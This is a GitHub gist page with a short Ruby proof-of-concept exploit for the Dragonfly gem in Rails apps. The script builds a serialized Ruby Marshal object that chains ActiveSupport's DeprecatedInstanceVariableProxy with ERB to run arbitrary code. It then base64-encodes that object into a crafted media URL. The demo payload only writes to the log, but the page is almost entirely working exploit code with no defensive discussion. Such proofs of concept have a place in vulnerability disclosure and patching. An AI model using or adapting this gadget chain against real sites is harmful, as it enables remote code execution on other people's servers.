Skip to content

Instantly share code, notes, and snippets.

@sj26

sj26/gist:7463720

Created November 14, 2013 09:04
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sj26/7463720 to your computer and use it in GitHub Desktop.
Save sj26/7463720 to your computer and use it in GitHub Desktop.
Download ZIP
Dragonfly marshal exploit PoC
Raw
gistfile1.rb
# If http://mysite.com/dragonfly responds, then:
string = "Here's a scary exploit"
code = "Rails.logger.info(#{string.inspect})"
marshalled = "\x04\x08o:\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0E@instanceo:\x08ERB\x06:\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method:\x0Bresult"
base64ed = Base64.encode64(marshalled).tr("\n=",'').tr('/','~')
url = "http://mysite.com/media/#{base64ed}/basename.format"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment